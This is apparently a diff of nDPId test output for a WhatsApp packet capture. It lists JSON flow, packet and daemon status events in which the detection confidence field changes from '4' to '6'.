-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105188559,"flow_last_seen":1655105188638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655105188638,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105188559,"flow_last_seen":1655105188638,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655105188638,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47590,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655105755895,"flow_last_seen":1655105755895,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655105755895,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1655105755895,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655105755895,"pkt":"eJS0JASgYDjgxTWgCABFAAA8kAlAAD8GcjjAqAJkszzDMcEUFGaXC5Z3AAAAAKAC\/\/9ZoAAAAgQFtAQCCAo4cnlzAAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1655105755961,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655105755961,"pkt":"eJS0JASgYDjgxTWgCABFAAA0kApAAD8Gcj\/AqAJkszzDMcEUFGaXC5Z47mWksoAQAIBl6QAAAQEICjhyea4zIlt\/"} 
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1655105755972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655105755972,"pkt":"eJS0JASgYDjgxTWgCABFAAA4kAtAAD8GcjrAqAJkszzDMcEUFGaXC5Z47mWksoAYAIAgbgAAAQEICjhyedgzIlt\/RUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105755895,"flow_last_seen":1655105756007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655105756007,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655097851208,"flow_last_seen":1655097851805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655105756270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105755895,"flow_last_seen":1655105756007,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655105756007,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49428,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655097851208,"flow_last_seen":1655097851805,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655105756270,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47350,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":553,"packets-processed":552,"total-skipped-flows":0,"total-l4-payload-len":41992,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":70,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":70,"total-idle-flows":64,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":467,"global_ts_msec":1655105790019} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655105790019,"flow_last_seen":1655105790019,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655105790019,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1655105790019,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655105790019,"pkt":"eJS0JASgYDjgxTWgCABFAAA8DWBAAD8G9OHAqAJkszzDMboSFGb46AYSAAAAAKAC\/\/\/MkwAAAgQFtAQCCArIAKx7AAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1655105790049,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655105790049,"pkt":"eJS0JASgYDjgxTWgCABFAAA0DWFAAD8G9OjAqAJkszzDMboSFGb46AYTXUqYTIAQAKwfkAAAAQEICsgArJpsf3jg"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1655105790056,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655105790056,"pkt":"eJS0JASgYDjgxTWgCABFAAA4DWJAAD8G9OPAqAJkszzDMboSFGb46AYTXUqYTIAYAKzaNwAAAQEICsgArKFsf3jgRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105790019,"flow_last_seen":1655105790086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655105790086,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":556,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655105790019,"flow_last_seen":1655105790086,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655105790086,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47634,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":561,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":561,"packets-processed":560,"total-skipped-flows":0,"total-l4-payload-len":42315,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":71,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":71,"total-idle-flows":64,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":473,"global_ts_msec":1655108001441} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":561,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655108001441,"flow_last_seen":1655108001441,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655108001441,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":561,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1655108001441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655108001441,"pkt":"eJS0JASgYDjgxTWgCABFAAA8CbZAAD8G+IvAqAJkszzDMcHKFGbmPQGiAAAAAKAC\/\/9GsQAAAgQFtAQCCApxlpgrAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1655108001604,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655108001604,"pkt":"eJS0JASgYDjgxTWgCABFAAA0CbdAAD8G+JLAqAJkszzDMcHKFGbmPQGj6JAdY4AQAICr2gAAAQEICnGWmOHkUd4Y"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1655108001607,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655108001607,"pkt":"eJS0JASgYDjgxTWgCABFAAA4CbhAAD8G+I3AqAJkszzDMcHKFGbmPQGj6JAdY4AYAIBmhgAAAQEICnGWmOTkUd4YRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108001441,"flow_last_seen":1655108001707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655108001707,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655099328045,"flow_last_seen":1655099328610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655108001999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655100445438,"flow_last_seen":1655100445972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655108001999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":564,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108001441,"flow_last_seen":1655108001707,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655108001707,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49610,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655099328045,"flow_last_seen":1655099328610,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1655108001999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49238,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655100445438,"flow_last_seen":1655100445972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":285,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1655108001999,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":49250,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655108385462,"flow_last_seen":1655108385462,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655108385462,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1655108385462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655108385462,"pkt":"eJS0JASgYDjgxTWgCABFAAA831VAAD8GIuzAqAJkszzDMZICFGbERxQMAAAAAKAC\/\/+w2QAAAgQFtAQCCAo4haZoAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1655108385503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655108385503,"pkt":"eJS0JASgYDjgxTWgCABFAAA031ZAAD8GIvPAqAJkszzDMZICFGbERxQNeBSrR4AQAIBROQAAAQEICjiFpqKHOOMP"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1655108385507,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655108385507,"pkt":"eJS0JASgYDjgxTWgCABFAAA431dAAD8GIu7AqAJkszzDMZICFGbERxQNeBSrR4AYAIAL5AAAAQEICjiFpqaHOOMPRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108385462,"flow_last_seen":1655108385546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655108385546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108385462,"flow_last_seen":1655108385546,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655108385546,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37378,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":577,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655108453657,"flow_last_seen":1655108453657,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655108453657,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1655108453657,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655108453657,"pkt":"eJS0JASgYDjgxTWgCABFAAA8GD5AAD8G6gPAqAJkszzDMbp6FGaSP+CCAAAAAKAC\/\/8T9gAAAgQFtAQCCArICfDgAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1655108453690,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655108453690,"pkt":"eJS0JASgYDjgxTWgCABFAAA0GD9AAD8G6grAqAJkszzDMbp6FGaSP+CDCev7oYAQAKwykAAAAQEICsgJ8QFJX8Bq"} 
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1655108453696,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655108453696,"pkt":"eJS0JASgYDjgxTWgCABFAAA4GEBAAD8G6gXAqAJkszzDMbp6FGaSP+CDCev7oYAYAKztOAAAAQEICsgJ8QdJX8BqRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108453657,"flow_last_seen":1655108453728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655108453728,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":580,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108453657,"flow_last_seen":1655108453728,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655108453728,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":47738,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":585,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":585,"packets-processed":584,"total-skipped-flows":0,"total-l4-payload-len":43736,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":74,"total-detection-updates":0,"total-updates":0,"current-active-flows":8,"total-active-flows":74,"total-idle-flows":66,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":491,"global_ts_msec":1655108977493} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655108977493,"flow_last_seen":1655108977493,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655108977493,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1655108977493,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655108977493,"pkt":"eJS0JASgYDjgxTWgCABFAAA8FDpAAD8G7gfAqAJkszzDMZIcFGYxkZdqAAAAAKAC\/\/+qXQAAAgQFtAQCCAo4hrwhAAAAAAEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1655108977535,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655108977535,"pkt":"eJS0JASgYDjgxTWgCABFAAA0FDtAAD8G7g7AqAJkszzDMZIcFGYxkZdrFO3l4YAQAIAhNgAAAQEICjiGvEzZk+LX"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1655108977728,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655108977728,"pkt":"eJS0JASgYDjgxTWgCABFAAA4FDxAAD8G7gnAqAJkszzDMZIcFGYxkZdrFO3l4YAYAIDbJQAAAQEICjiGvQvZk+LXRUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655108977493,"flow_last_seen":1655108977793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655108977793,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":37404,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
